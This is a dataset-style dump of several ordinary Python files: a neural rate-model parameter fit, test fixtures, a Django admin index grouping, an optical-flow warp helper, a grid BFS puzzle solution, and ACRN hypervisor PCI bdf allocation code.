max_stars_repo_path stringlengths 4 286 | max_stars_repo_name stringlengths 5 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.03M | content_cleaned stringlengths 6 1.03M | language stringclasses 111 values | language_score float64 0.03 1 | comments stringlengths 0 556k | edu_score float64 0.32 5.03 | edu_int_score int64 0 5 |
|---|---|---|---|---|---|---|---|---|---|---|
BasalGanglia/synaptic_transmission_fit.py | Richert/BrainNetworks | 0 | 6612351 | from pyrates.frontend import CircuitTemplate
from pyrates.utility.grid_search import grid_search
from pyrates.utility.visualization import plot_connectivity
import matplotlib.pyplot as plt
import os
import numpy as np
# parameters
dt = 5e-4
T = 50.0
start = int(10.0/dt)
stop = int(12.0/dt)
dts = 1e-2
inp = np.zeros((int(T/dt), 1))
inp[start:stop] = 1.0
# target: delayed biexponential feedback
biexp = CircuitTemplate.from_yaml("config/stn_gpe/biexp_gamma")
r1 = biexp.run(simulation_time=T, sampling_step_size=dts, inputs={'n1/biexp_rate/I_ext': inp},
outputs={'r': 'n1/biexp_rate/r'}, backend='numpy', step_size=dt, solver='euler')
# fig, ax = plt.subplots()
# ax.plot(r1['r'])
# plt.show()
# approximation: gamma-distributed feedback
param_grid = {'d': np.asarray([5.0, 6.0, 7.0]),
's': np.asarray([1.0, 1.5, 2.0])}
param_map = {'d': {'vars': ['delay'], 'edges': [('n1/biexp_rate/r2', 'n1/biexp_rate/r_in')]},
's': {'vars': ['spread'], 'edges': [('n1/biexp_rate/r2', 'n1/biexp_rate/r_in')]}}
out_var = 'n1/biexp_rate/r'
r2, r_map = grid_search("config/stn_gpe/biexp_gamma", param_grid, param_map, step_size=dt, simulation_time=T,
sampling_step_size=dts, permute_grid=True, backend='numpy', solver='euler',
outputs={'r': out_var}, inputs={'n1/biexp_rate/I_ext': inp}, clear=False)
# calculate difference between target and approximation
n = len(param_grid['d'])
m = len(param_grid['s'])
alpha = 0.95  # weight of the trace error vs. the order penalty in the cost
error = np.zeros((n, m))
indices = [['_'for j in range(m)] for i in range(n)]
for idx in r_map.index:
    # Map this grid-search result back to its (delay, spread) cell in the grid.
    idx_r = np.argmin(np.abs(param_grid['d'] - r_map.at[idx, 'd']))
    idx_c = np.argmin(np.abs(param_grid['s'] - r_map.at[idx, 's']))
    r = r2.loc[:, ('r', f"{idx}/{out_var}")]
    diff = r - r1.loc[:, 'r']
    d, s = r_map.loc[idx, 'd'], r_map.loc[idx, 's']
    # Integer order implied by the delay/spread ratio (presumably the order of
    # the gamma kernel used for the approximation — confirm against the model).
    order = int(np.round((d/s)**2))
    # Cost: L2 distance to the target trace plus a small penalty on the order.
    error[idx_r, idx_c] = alpha*np.sqrt(diff.T @ diff) + (1-alpha)*order
    print(f"delay = {d}, spread = {s}, order = {order}, rate = {order/d}, error = {error[idx_r, idx_c]}")
    indices[idx_r.squeeze()][idx_c.squeeze()] = idx
# display error
fig, ax = plt.subplots()
ax = plot_connectivity(error, xticklabels=param_grid['s'], yticklabels=param_grid['d'], ax=ax)
ax.set_xlabel('s')
ax.set_ylabel('d')
plt.tight_layout()
# display winner together with target
fig2, ax2 = plt.subplots()
winner = np.argmin(error)
idx = np.asarray(indices).flatten()[winner]
ax2.plot(r1.loc[:, 'r'])
ax2.plot(r2.loc[:, ('r', f"{idx}/{out_var}")])
plt.legend(['discrete', 'gamma'])
ax2.set_title(f"delay = {r_map.loc[idx, 'd']}, spread = {r_map.loc[idx, 's']}, error = {error.flatten()[winner]}")
plt.tight_layout()
plt.show()
| from pyrates.frontend import CircuitTemplate
from pyrates.utility.grid_search import grid_search
from pyrates.utility.visualization import plot_connectivity
import matplotlib.pyplot as plt
import os
import numpy as np
# parameters
dt = 5e-4
T = 50.0
start = int(10.0/dt)
stop = int(12.0/dt)
dts = 1e-2
inp = np.zeros((int(T/dt), 1))
inp[start:stop] = 1.0
# target: delayed biexponential feedback
biexp = CircuitTemplate.from_yaml("config/stn_gpe/biexp_gamma")
r1 = biexp.run(simulation_time=T, sampling_step_size=dts, inputs={'n1/biexp_rate/I_ext': inp},
outputs={'r': 'n1/biexp_rate/r'}, backend='numpy', step_size=dt, solver='euler')
# fig, ax = plt.subplots()
# ax.plot(r1['r'])
# plt.show()
# approximation: gamma-distributed feedback
param_grid = {'d': np.asarray([5.0, 6.0, 7.0]),
's': np.asarray([1.0, 1.5, 2.0])}
param_map = {'d': {'vars': ['delay'], 'edges': [('n1/biexp_rate/r2', 'n1/biexp_rate/r_in')]},
's': {'vars': ['spread'], 'edges': [('n1/biexp_rate/r2', 'n1/biexp_rate/r_in')]}}
out_var = 'n1/biexp_rate/r'
r2, r_map = grid_search("config/stn_gpe/biexp_gamma", param_grid, param_map, step_size=dt, simulation_time=T,
sampling_step_size=dts, permute_grid=True, backend='numpy', solver='euler',
outputs={'r': out_var}, inputs={'n1/biexp_rate/I_ext': inp}, clear=False)
# calculate difference between target and approximation
n = len(param_grid['d'])
m = len(param_grid['s'])
alpha = 0.95
error = np.zeros((n, m))
indices = [['_'for j in range(m)] for i in range(n)]
for idx in r_map.index:
idx_r = np.argmin(np.abs(param_grid['d'] - r_map.at[idx, 'd']))
idx_c = np.argmin(np.abs(param_grid['s'] - r_map.at[idx, 's']))
r = r2.loc[:, ('r', f"{idx}/{out_var}")]
diff = r - r1.loc[:, 'r']
d, s = r_map.loc[idx, 'd'], r_map.loc[idx, 's']
order = int(np.round((d/s)**2))
error[idx_r, idx_c] = alpha*np.sqrt(diff.T @ diff) + (1-alpha)*order
print(f"delay = {d}, spread = {s}, order = {order}, rate = {order/d}, error = {error[idx_r, idx_c]}")
indices[idx_r.squeeze()][idx_c.squeeze()] = idx
# display error
fig, ax = plt.subplots()
ax = plot_connectivity(error, xticklabels=param_grid['s'], yticklabels=param_grid['d'], ax=ax)
ax.set_xlabel('s')
ax.set_ylabel('d')
plt.tight_layout()
# display winner together with target
fig2, ax2 = plt.subplots()
winner = np.argmin(error)
idx = np.asarray(indices).flatten()[winner]
ax2.plot(r1.loc[:, 'r'])
ax2.plot(r2.loc[:, ('r', f"{idx}/{out_var}")])
plt.legend(['discrete', 'gamma'])
ax2.set_title(f"delay = {r_map.loc[idx, 'd']}, spread = {r_map.loc[idx, 's']}, error = {error.flatten()[winner]}")
plt.tight_layout()
plt.show()
| en | 0.549501 | # parameters # target: delayed biexponential feedback # fig, ax = plt.subplots() # ax.plot(r1['r']) # plt.show() # approximation: gamma-distributed feedback # calculate difference between target and approximation # display error # display winner together with target | 2.165322 | 2 |
assignment2/src/photogallery/tests/integration/end_to_end_test.py | rahulraj/web_projects | 1 | 6612352 | <reponame>rahulraj/web_projects
import unittest
import os.path
import shutil
from copier_test import create_directory
from ...generator.gallerygenerator import create_gallery_generator
class EndToEndTest(unittest.TestCase):
    """
    This test case runs the application from start to end.
    """
    def setUp(self):
        # Build a throwaway gallery source tree under /tmp: two top-level
        # "images", one image in a subdirectory, and an empty JSON manifest.
        # TODO get some actual jpeg files
        create_directory('/tmp/fromdir')
        create_directory('/tmp/fromdir/first_sub')
        create_directory('/tmp/todir')
        with open('/tmp/fromdir/foo.jpg', 'w') as first_jpg:
            first_jpg.write('some jpeg data')
        with open('/tmp/fromdir/bar.jpg', 'w') as second_jpg:
            second_jpg.write('some more jpeg data')
        with open('/tmp/fromdir/first_sub/baz.jpg', 'w') as third_jpg:
            third_jpg.write('even more jpeg data')
        with open('/tmp/fromdir/manifest.json', 'w') as json_file:
            json_file.write('{}')
    def disabled_test_it_should_create_html_files(self):
        """
        This test needs actual JPEGs, not text files pretending to be.
        """
        # Deliberately disabled: the early return skips everything below until
        # real JPEG fixtures replace the text placeholders written in setUp.
        return
        command_line_arguments = ['-i', '/tmp/fromdir', '-o', '/tmp/todir',
                                  '-m', '/tmp/fromdir/manifest.json']
        generator = create_gallery_generator(command_line_arguments)
        generator.run()
        self.assertTrue(os.path.isfile('/tmp/todir/foo.html'))
        self.assertTrue(os.path.isfile('/tmp/todir/bar.html'))
        self.assertTrue(os.path.isfile('/tmp/todir/tmp.html'))
        self.assertTrue(os.path.isfile('/tmp/todir/tmp-fromdir-first_sub.html'))
        self.assertTrue(os.path.isfile('/tmp/todir/baz.html'))
    def tearDown(self):
        # Remove both temporary trees so repeated runs start from a clean slate.
        shutil.rmtree('/tmp/fromdir')
        shutil.rmtree('/tmp/todir')
shutil.rmtree('/tmp/todir')
| import unittest
import os.path
import shutil
from copier_test import create_directory
from ...generator.gallerygenerator import create_gallery_generator
class EndToEndTest(unittest.TestCase):
"""
This test case runs the application from start to end.
"""
def setUp(self):
# TODO get some actual jpeg files
create_directory('/tmp/fromdir')
create_directory('/tmp/fromdir/first_sub')
create_directory('/tmp/todir')
with open('/tmp/fromdir/foo.jpg', 'w') as first_jpg:
first_jpg.write('some jpeg data')
with open('/tmp/fromdir/bar.jpg', 'w') as second_jpg:
second_jpg.write('some more jpeg data')
with open('/tmp/fromdir/first_sub/baz.jpg', 'w') as third_jpg:
third_jpg.write('even more jpeg data')
with open('/tmp/fromdir/manifest.json', 'w') as json_file:
json_file.write('{}')
def disabled_test_it_should_create_html_files(self):
"""
This test needs actual JPEGs, not text files pretending to be.
"""
return
command_line_arguments = ['-i', '/tmp/fromdir', '-o', '/tmp/todir',
'-m', '/tmp/fromdir/manifest.json']
generator = create_gallery_generator(command_line_arguments)
generator.run()
self.assertTrue(os.path.isfile('/tmp/todir/foo.html'))
self.assertTrue(os.path.isfile('/tmp/todir/bar.html'))
self.assertTrue(os.path.isfile('/tmp/todir/tmp.html'))
self.assertTrue(os.path.isfile('/tmp/todir/tmp-fromdir-first_sub.html'))
self.assertTrue(os.path.isfile('/tmp/todir/baz.html'))
def tearDown(self):
shutil.rmtree('/tmp/fromdir')
shutil.rmtree('/tmp/todir') | en | 0.596688 | This test case runs the application from start to end. # TODO get some actual jpeg files This test needs actual JPEGs, not text files pretending to be. | 2.880946 | 3 |
tests/conftest.py | AuHau/giTrack | 5 | 6612353 | <reponame>AuHau/giTrack
import pytest
def pytest_collection_modifyitems(items):
    """Auto-tag collected tests by their location: integration/ vs unit/."""
    for collected in items:
        if collected.fspath is None:
            continue
        location = str(collected.fspath)
        if 'integration' in location:
            collected.add_marker(pytest.mark.integration)
        if 'unit' in location:
            collected.add_marker(pytest.mark.unit)
| import pytest
def pytest_collection_modifyitems(items):
    """Auto-tag collected tests by their location: integration/ vs unit/."""
    for collected in items:
        if collected.fspath is None:
            continue
        location = str(collected.fspath)
        if 'integration' in location:
            collected.add_marker(pytest.mark.integration)
        if 'unit' in location:
            collected.add_marker(pytest.mark.unit)
item.add_marker(pytest.mark.unit) | none | 1 | 2.475139 | 2 | |
src/augment/optical_flow/warp.py | TencentYoutuResearch/SelfSupervisedLearning-DSM | 27 | 6612354 | import cv2
import numpy as np
def warp_flow(img, flow):
    """Warp ``img`` by the optical-flow field ``flow`` via backward remapping."""
    height, width = flow.shape[:2]
    # Absolute sampling map: destination pixel (x, y) samples the source at
    # (x, y) - flow[y, x]. Negating first leaves the caller's array untouched.
    sample_map = -flow
    sample_map[:, :, 0] += np.arange(width)
    sample_map[:, :, 1] += np.arange(height)[:, np.newaxis]
    return cv2.remap(img, sample_map, None, cv2.INTER_LINEAR)
| import cv2
import numpy as np
def warp_flow(img, flow):
    """Warp ``img`` by the optical-flow field ``flow`` via backward remapping."""
    height, width = flow.shape[:2]
    # Absolute sampling map: destination pixel (x, y) samples the source at
    # (x, y) - flow[y, x]. Negating first leaves the caller's array untouched.
    sample_map = -flow
    sample_map[:, :, 0] += np.arange(width)
    sample_map[:, :, 1] += np.arange(height)[:, np.newaxis]
    return cv2.remap(img, sample_map, None, cv2.INTER_LINEAR)
| none | 1 | 2.727816 | 3 | |
src/bitcaster/config/admin.py | bitcaster-io/bitcaster | 4 | 6612355 | from collections import OrderedDict
from constance import config
from django.conf import settings
from django.contrib.admin import AdminSite
from django.contrib.admin.apps import SimpleAdminConfig
from django.core.cache import caches
from django.template.response import TemplateResponse
from django.utils.translation import gettext_lazy
from django.views.decorators.cache import never_cache
from bitcaster import get_full_version
cache = caches['default']
DEFAULT_INDEX_SECTIONS = {
'Other': [],
'_hidden_': ['sites', 'unicef_rest_framework.Application',
'oauth2_provider', 'social_django',
'django_celery_beat.PeriodicTask']
}
class BitcasterAdminSite(AdminSite):
    """Admin site that replaces the stock index with a grouped, cached one."""
    site_title = gettext_lazy('Bitcaster')
    site_header = gettext_lazy('Bitcaster administration')
    @never_cache
    def index(self, request, extra_context=None):
        # A cookie lets the user opt back into the stock Django index page.
        style = request.COOKIES.get('old_index_style', 0)
        if style in [1, '1']:
            return super(BitcasterAdminSite, self).index(request, {'index_style': 0})
        else:
            return self.index_new(request, {'index_style': 1})
    @never_cache
    def index_new(self, request, extra_context=None):
        """Render the grouped admin index; grouping is cached per user/version."""
        # Key changes on release or CACHE_VERSION bump, invalidating old groups.
        key = f'apps_groups:{request.user.id}:{get_full_version()}:{config.CACHE_VERSION}'
        app_list = self.get_app_list(request)
        groups = cache.get(key)
        if not groups:
            sections = getattr(settings, 'INDEX_SECTIONS', DEFAULT_INDEX_SECTIONS)
            groups = OrderedDict([(k, []) for k in sections.keys()])
            def get_section(model, app):
                # Resolve the section for "app_label.ObjectName". An exact model
                # match returns immediately; an app-label match only sets the
                # fallback. '_hidden_' routes the entry to the hidden bucket.
                fqn = '%s.%s' % (app['app_label'], model['object_name'])
                target = 'Other'
                if fqn in sections['_hidden_'] or app['app_label'] in sections['_hidden_']:
                    return '_hidden_'
                for sec, models in sections.items():
                    if fqn in models:
                        return sec
                    elif app['app_label'] in models:
                        target = sec
                return target
            for app in app_list:
                for model in app['models']:
                    sec = get_section(model, app)
                    groups[sec].append(
                        {'app_label': str(app['app_label']),
                         'app_name': str(app['name']),
                         'app_url': app['app_url'],
                         'label': '%s - %s' % (app['name'], model['object_name']),
                         'model_name': str(model['name']),
                         'admin_url': model['admin_url'],
                         'perms': model['perms']})
            for __, models in groups.items():
                models.sort(key=lambda x: x['label'])
            cache.set(key, groups, 60 * 60)  # cache for one hour
        context = {
            **self.each_context(request),
            # 'title': self.index_title,
            'app_list': app_list,
            'groups': dict(groups),
            **(extra_context or {}),
        }
        request.current_app = self.name
        return TemplateResponse(request, 'admin/index_new.html', context)
class AdminConfig(SimpleAdminConfig):
    """The default AppConfig for admin which does autodiscovery."""
    # NOTE(review): this path points at the etools_datamart project, not
    # bitcaster — presumably left over from a copy; confirm the intended
    # default admin site for this project.
    default_site = 'etools_datamart.config.admin.DatamartAdminSite'
    def ready(self):
        super().ready()
        # Import every installed app's admin module (standard autodiscovery).
        self.module.autodiscover()
| from collections import OrderedDict
from constance import config
from django.conf import settings
from django.contrib.admin import AdminSite
from django.contrib.admin.apps import SimpleAdminConfig
from django.core.cache import caches
from django.template.response import TemplateResponse
from django.utils.translation import gettext_lazy
from django.views.decorators.cache import never_cache
from bitcaster import get_full_version
cache = caches['default']
DEFAULT_INDEX_SECTIONS = {
'Other': [],
'_hidden_': ['sites', 'unicef_rest_framework.Application',
'oauth2_provider', 'social_django',
'django_celery_beat.PeriodicTask']
}
class BitcasterAdminSite(AdminSite):
site_title = gettext_lazy('Bitcaster')
site_header = gettext_lazy('Bitcaster administration')
@never_cache
def index(self, request, extra_context=None):
style = request.COOKIES.get('old_index_style', 0)
if style in [1, '1']:
return super(BitcasterAdminSite, self).index(request, {'index_style': 0})
else:
return self.index_new(request, {'index_style': 1})
@never_cache
def index_new(self, request, extra_context=None):
key = f'apps_groups:{request.user.id}:{get_full_version()}:{config.CACHE_VERSION}'
app_list = self.get_app_list(request)
groups = cache.get(key)
if not groups:
sections = getattr(settings, 'INDEX_SECTIONS', DEFAULT_INDEX_SECTIONS)
groups = OrderedDict([(k, []) for k in sections.keys()])
def get_section(model, app):
fqn = '%s.%s' % (app['app_label'], model['object_name'])
target = 'Other'
if fqn in sections['_hidden_'] or app['app_label'] in sections['_hidden_']:
return '_hidden_'
for sec, models in sections.items():
if fqn in models:
return sec
elif app['app_label'] in models:
target = sec
return target
for app in app_list:
for model in app['models']:
sec = get_section(model, app)
groups[sec].append(
{'app_label': str(app['app_label']),
'app_name': str(app['name']),
'app_url': app['app_url'],
'label': '%s - %s' % (app['name'], model['object_name']),
'model_name': str(model['name']),
'admin_url': model['admin_url'],
'perms': model['perms']})
for __, models in groups.items():
models.sort(key=lambda x: x['label'])
cache.set(key, groups, 60 * 60)
context = {
**self.each_context(request),
# 'title': self.index_title,
'app_list': app_list,
'groups': dict(groups),
**(extra_context or {}),
}
request.current_app = self.name
return TemplateResponse(request, 'admin/index_new.html', context)
class AdminConfig(SimpleAdminConfig):
"""The default AppConfig for admin which does autodiscovery."""
default_site = 'etools_datamart.config.admin.DatamartAdminSite'
def ready(self):
super().ready()
self.module.autodiscover()
| en | 0.60593 | # 'title': self.index_title, The default AppConfig for admin which does autodiscovery. | 1.8174 | 2 |
BOJ2667.py | INYEONGKIM/BOJ | 2 | 6612356 | <filename>BOJ2667.py
# BOJ 2667: count the connected groups of '1' cells in an n x n grid and print
# the number of groups followed by the sorted group sizes, one per line.
n=int(input());g=[list(input()) for _ in range(n)]
def bfs(i,j):
    # Flood-fill from (i, j); neighbours are zeroed as they are queued.
    q=__import__('collections').deque()
    q.append((i,j))
    c=0
    while q:
        x,y=q.popleft()
        if 0<=x-1 and g[x-1][y]=='1':
            q.append((x-1,y))
            g[x-1][y]='0'
        if x+1<n and g[x+1][y]=='1':
            q.append((x+1,y))
            g[x+1][y]='0'
        if 0<=y-1 and g[x][y-1]=='1':
            q.append((x,y-1))
            g[x][y-1]='0'
        if y+1<n and g[x][y+1]=='1':
            q.append((x,y+1))
            g[x][y+1]='0'
        c+=1
    # The start cell is never zeroed up front, so in any group of size >= 2 a
    # neighbour re-enqueues it and it is popped twice; c-1 corrects for that.
    # An isolated single cell is popped exactly once, hence the c == 1 branch.
    if c==1: return 1
    else: return c-1
tot=0;r="";a=[]
for i in range(n):
    for j in range(n):
        if g[i][j]=='1':
            tot+=1;a.append(bfs(i,j))
# tot mirrors len(a); only len(a) is actually used in the output.
r+=str(len(a))+'\n';a.sort()
r+='\n'.join(map(str,a))
print(r)
| <filename>BOJ2667.py
n=int(input());g=[list(input()) for _ in range(n)]
def bfs(i,j):
q=__import__('collections').deque()
q.append((i,j))
c=0
while q:
x,y=q.popleft()
if 0<=x-1 and g[x-1][y]=='1':
q.append((x-1,y))
g[x-1][y]='0'
if x+1<n and g[x+1][y]=='1':
q.append((x+1,y))
g[x+1][y]='0'
if 0<=y-1 and g[x][y-1]=='1':
q.append((x,y-1))
g[x][y-1]='0'
if y+1<n and g[x][y+1]=='1':
q.append((x,y+1))
g[x][y+1]='0'
c+=1
if c==1: return 1
else: return c-1
tot=0;r="";a=[]
for i in range(n):
for j in range(n):
if g[i][j]=='1':
tot+=1;a.append(bfs(i,j))
r+=str(len(a))+'\n';a.sort()
r+='\n'.join(map(str,a))
print(r)
| none | 1 | 3.167658 | 3 | |
misc/config_tools/static_allocators/bdf.py | tnishiok/acrn-hypervisor | 0 | 6612357 | <gh_stars>0
#!/usr/bin/env python3
#
# Copyright (C) 2021 Intel Corporation.
#
# SPDX-License-Identifier: BSD-3-Clause
#
import sys, os, re
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'library'))
import common, lib.error, lib.lib
from collections import namedtuple
# Constants for device name prefix
IVSHMEM = "IVSHMEM"
VUART = "VUART"
PTDEV = "PTDEV"
# Exception bdf list
# Some hardware drivers' bdf is hardcoded, the bdf cannot be changed even it is passtrhough devices.
HARDCODED_BDF_LIST = ["00:0e.0"]
class BusDevFunc(namedtuple("BusDevFunc", ["bus", "dev", "func"])):
    """A PCI bus:device.function triple (immutable, comparable, hashable)."""

    # Two lowercase hex digits for bus and device, one digit 0-7 for function.
    PATTERN = re.compile(r"(?P<bus>[0-9a-f]{2}):(?P<dev>[0-9a-f]{2})\.(?P<func>[0-7]{1})")

    @classmethod
    def from_str(cls, value):
        """Parse a textual bdf such as "00:1f.6" into a BusDevFunc."""
        if not isinstance(value, str):
            raise ValueError("value must be a str: {}".format(type(value)))
        parsed = cls.PATTERN.fullmatch(value)
        if parsed is None:
            raise ValueError("not a bdf: {!r}".format(value))
        return cls(
            bus=int(parsed.group("bus"), 16),
            dev=int(parsed.group("dev"), 16),
            func=int(parsed.group("func"), 16))

    def __init__(self, *args, **kwargs):
        # The namedtuple base assigns the fields in __new__; __init__ only
        # validates that each component is within its architectural range.
        if self.bus < 0x00 or self.bus > 0xff:
            raise ValueError(f"Invalid bus number (0x00 ~ 0xff): {self.bus:#04x}")
        if self.dev < 0x00 or self.dev > 0x1f:
            raise ValueError(f"Invalid device number (0x00 ~ 0x1f): {self.dev:#04x}")
        if self.func < 0x0 or self.func > 0x7:
            raise ValueError(f"Invalid function number (0 ~ 7): {self.func:#x}")

    def __str__(self):
        return f"{self.bus:02x}:{self.dev:02x}.{self.func:x}"

    def __repr__(self):
        return f"BusDevFunc.from_str({str(self)!r})"
def find_unused_bdf(used_bdf):
    """Return a bdf on virtual bus 0 whose device number is not yet taken."""
    # Device 0:00.0 is reserved for the pci hostbridge, so start at device 1.
    taken_devs = {in_use.dev for in_use in used_bdf}
    for dev_nr in range(0x1, 0x20):
        if dev_nr not in taken_devs:
            return BusDevFunc(bus=0x00, dev=dev_nr, func=0x0)
    raise lib.error.ResourceError(f"Cannot find free bdf, used bdf: {sorted(used_bdf)}")
def insert_vuart_to_dev_dict(scenario_etree, devdict, used):
    """Allocate a free bdf for every PCI-based console/communication vuart."""
    console_ids = scenario_etree.xpath("./console_vuart[base != 'INVALID_PCI_BASE']/@id")
    comm_ids = scenario_etree.xpath(".//communication_vuart[base != 'INVALID_PCI_BASE']/@id")
    # Console vuarts are allocated first, then communication vuarts, matching
    # the original assignment order.
    for vuart_id in list(console_ids) + list(comm_ids):
        free_bdf = find_unused_bdf(used)
        devdict[f"{VUART}_{vuart_id}"] = free_bdf
        used.append(free_bdf)
def insert_ivsheme_to_dev_dict(scenario_etree, devdict, vm_id, used):
    """Allocate a free bdf for each ivshmem region attached to this VM."""
    shmem_regions = lib.lib.get_shmem_regions(scenario_etree)
    if vm_id not in shmem_regions:
        return
    for shm in shmem_regions[vm_id].values():
        free_bdf = find_unused_bdf(used)
        devdict[f"{IVSHMEM}_{shm.get('id')}"] = free_bdf
        used.append(free_bdf)
def insert_pt_devs_to_dev_dict(vm_node_etree, devdict, used):
    """
    Assign a bdf to each of this VM's passthrough devices.

    Devices listed in HARDCODED_BDF_LIST keep their native bdf (their drivers
    hardcode it); every other passthrough device receives an unused bdf from
    find_unused_bdf().
    """
    pt_devs = vm_node_etree.xpath(f".//pci_dev/text()")
    # First pass: keep the native bdf for devices in HARDCODED_BDF_LIST.
    for pt_dev in pt_devs:
        bdf_string = pt_dev.split()[0]
        if bdf_string in HARDCODED_BDF_LIST:
            bdf = BusDevFunc.from_str(bdf_string)
            dev_name = f"{PTDEV}_{bdf.bus:#04x}_{((bdf.dev << 16) | bdf.func):#08x}".upper()
            devdict[dev_name] = bdf
            used.append(bdf)
    # Drop the devices already handled above. Bug fix: the previous code
    # filtered on the stale loop variable `bdf_string` (the *last* device of
    # the loop above), so the filter compared every device against one fixed
    # bdf; each device must be tested against its own bdf instead.
    pt_devs = [pt_dev for pt_dev in pt_devs
               if BusDevFunc.from_str(pt_dev.split()[0]) not in used]
    # Second pass: allocate an unused bdf for each remaining device; the
    # device name still encodes its native (physical) bdf.
    for pt_dev in pt_devs:
        bdf = BusDevFunc.from_str(pt_dev.split()[0])
        free_bdf = find_unused_bdf(used)
        dev_name = f"{PTDEV}_{bdf.bus:#04x}_{((bdf.dev << 16) | bdf.func):#08x}".upper()
        devdict[dev_name] = free_bdf
        used.append(free_bdf)
def get_devs_bdf_native(board_etree):
    """
    Get all pci devices' bdf in native environment.
    return: list of pci devices' bdf
    """
    dev_list = []
    for node in board_etree.xpath("//bus[@type = 'pci' and @id]/device[@address]"):
        # The device address packs dev in the high 16 bits, func in the low 16;
        # the bus number comes from the parent <bus> element.
        raw_address = int(node.get('address'), 16)
        parent_bus = int(common.get_node("../@address", node), 16)
        dev_list.append(BusDevFunc(bus=parent_bus,
                                   dev=raw_address >> 16,
                                   func=raw_address & 0xffff))
    return dev_list
def get_devs_bdf_passthrough(scenario_etree):
    """
    Get all pre-launched vms' passthrough devices' bdf in native environment.
    return: list of passthrough devices' bdf.
    """
    bdf_list = []
    for vm_type in lib.lib.PRE_LAUNCHED_VMS_TYPE:
        for pt_dev in scenario_etree.xpath(f"//vm[vm_type = '{vm_type}']/pci_devs/pci_dev/text()"):
            # The bdf is the first whitespace-separated token of the entry.
            bdf_list.append(BusDevFunc.from_str(pt_dev.split()[0]))
    return bdf_list
def create_device_node(allocation_etree, vm_id, devdict):
    """Write each allocated bdf under <vm id=...>/<device> in allocation_etree."""
    for dev_name, bdf in devdict.items():
        vm_node = common.get_node(f"/acrn-config/vm[@id = '{vm_id}']", allocation_etree)
        if vm_node is None:
            vm_node = common.append_node("/acrn-config/vm", None, allocation_etree, id = vm_id)
        dev_node = common.get_node(f"./device[@name = '{dev_name}']", vm_node)
        if dev_node is None:
            dev_node = common.append_node("./device", None, vm_node, name = dev_name)
        # Emit bus/dev/func as upper-case hex (e.g. "0X05"), skipping any
        # component that is already present.
        for tag, number in (("bus", bdf.bus), ("dev", bdf.dev), ("func", bdf.func)):
            if common.get_node(f"./{tag}", dev_node) is None:
                common.append_node(f"./{tag}", f"{number:#04x}".upper(), dev_node)
def fn(board_etree, scenario_etree, allocation_etree):
    """Allocator entry point: assign device bdfs for every non-post-launched
    VM in the scenario and record them in allocation_etree."""
    vm_nodes = scenario_etree.xpath("//vm")
    for vm_node in vm_nodes:
        vm_id = vm_node.get('id')
        devdict = {}  # device name -> allocated BusDevFunc
        used = []     # bdfs already occupied on the VM's virtual bus
        vm_type = common.get_node("./vm_type/text()", vm_node)
        # Post-launched VMs are skipped entirely here.
        if vm_type is not None and lib.lib.is_post_launched_vm(vm_type):
            continue
        # For the service VM, every native bdf that is not passed through to
        # another VM stays visible and therefore counts as occupied.
        if vm_type is not None and lib.lib.is_sos_vm(vm_type):
            native_used = get_devs_bdf_native(board_etree)
            passthrough_used = get_devs_bdf_passthrough(scenario_etree)
            used = [bdf for bdf in native_used if bdf not in passthrough_used]
        # NOTE(review): board-specific quirk — 00:01.0 is reserved on tgl-rvp;
        # confirm against that board's PCI layout.
        if common.get_node("//@board", scenario_etree) == "tgl-rvp":
            used.append(BusDevFunc(bus = 0, dev = 1, func = 0))
        insert_vuart_to_dev_dict(vm_node, devdict, used)
        insert_ivsheme_to_dev_dict(scenario_etree, devdict, vm_id, used)
        insert_pt_devs_to_dev_dict(vm_node, devdict, used)
        create_device_node(allocation_etree, vm_id, devdict)
| #!/usr/bin/env python3
#
# Copyright (C) 2021 Intel Corporation.
#
# SPDX-License-Identifier: BSD-3-Clause
#
import sys, os, re
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', 'library'))
import common, lib.error, lib.lib
from collections import namedtuple
# Constants for device name prefix
IVSHMEM = "IVSHMEM"
VUART = "VUART"
PTDEV = "PTDEV"
# Exception bdf list
# Some hardware drivers' bdf is hardcoded, the bdf cannot be changed even it is passtrhough devices.
HARDCODED_BDF_LIST = ["00:0e.0"]
class BusDevFunc(namedtuple("BusDevFunc", ["bus", "dev", "func"])):
    """A PCI bus:device.function triple (immutable, comparable, hashable)."""

    # Two lowercase hex digits for bus and device, one digit 0-7 for function.
    PATTERN = re.compile(r"(?P<bus>[0-9a-f]{2}):(?P<dev>[0-9a-f]{2})\.(?P<func>[0-7]{1})")

    @classmethod
    def from_str(cls, value):
        """Parse a textual bdf such as "00:1f.6" into a BusDevFunc."""
        if not isinstance(value, str):
            raise ValueError("value must be a str: {}".format(type(value)))
        parsed = cls.PATTERN.fullmatch(value)
        if parsed is None:
            raise ValueError("not a bdf: {!r}".format(value))
        return cls(
            bus=int(parsed.group("bus"), 16),
            dev=int(parsed.group("dev"), 16),
            func=int(parsed.group("func"), 16))

    def __init__(self, *args, **kwargs):
        # The namedtuple base assigns the fields in __new__; __init__ only
        # validates that each component is within its architectural range.
        if self.bus < 0x00 or self.bus > 0xff:
            raise ValueError(f"Invalid bus number (0x00 ~ 0xff): {self.bus:#04x}")
        if self.dev < 0x00 or self.dev > 0x1f:
            raise ValueError(f"Invalid device number (0x00 ~ 0x1f): {self.dev:#04x}")
        if self.func < 0x0 or self.func > 0x7:
            raise ValueError(f"Invalid function number (0 ~ 7): {self.func:#x}")

    def __str__(self):
        return f"{self.bus:02x}:{self.dev:02x}.{self.func:x}"

    def __repr__(self):
        return f"BusDevFunc.from_str({str(self)!r})"
def find_unused_bdf(used_bdf):
    """Return a bdf on virtual bus 0 whose device number is not yet taken."""
    # Device 0:00.0 is reserved for the pci hostbridge, so start at device 1.
    taken_devs = {in_use.dev for in_use in used_bdf}
    for dev_nr in range(0x1, 0x20):
        if dev_nr not in taken_devs:
            return BusDevFunc(bus=0x00, dev=dev_nr, func=0x0)
    raise lib.error.ResourceError(f"Cannot find free bdf, used bdf: {sorted(used_bdf)}")
def insert_vuart_to_dev_dict(scenario_etree, devdict, used):
    """Allocate a free bdf for every PCI-based console/communication vuart."""
    console_ids = scenario_etree.xpath("./console_vuart[base != 'INVALID_PCI_BASE']/@id")
    comm_ids = scenario_etree.xpath(".//communication_vuart[base != 'INVALID_PCI_BASE']/@id")
    # Console vuarts are allocated first, then communication vuarts, matching
    # the original assignment order.
    for vuart_id in list(console_ids) + list(comm_ids):
        free_bdf = find_unused_bdf(used)
        devdict[f"{VUART}_{vuart_id}"] = free_bdf
        used.append(free_bdf)
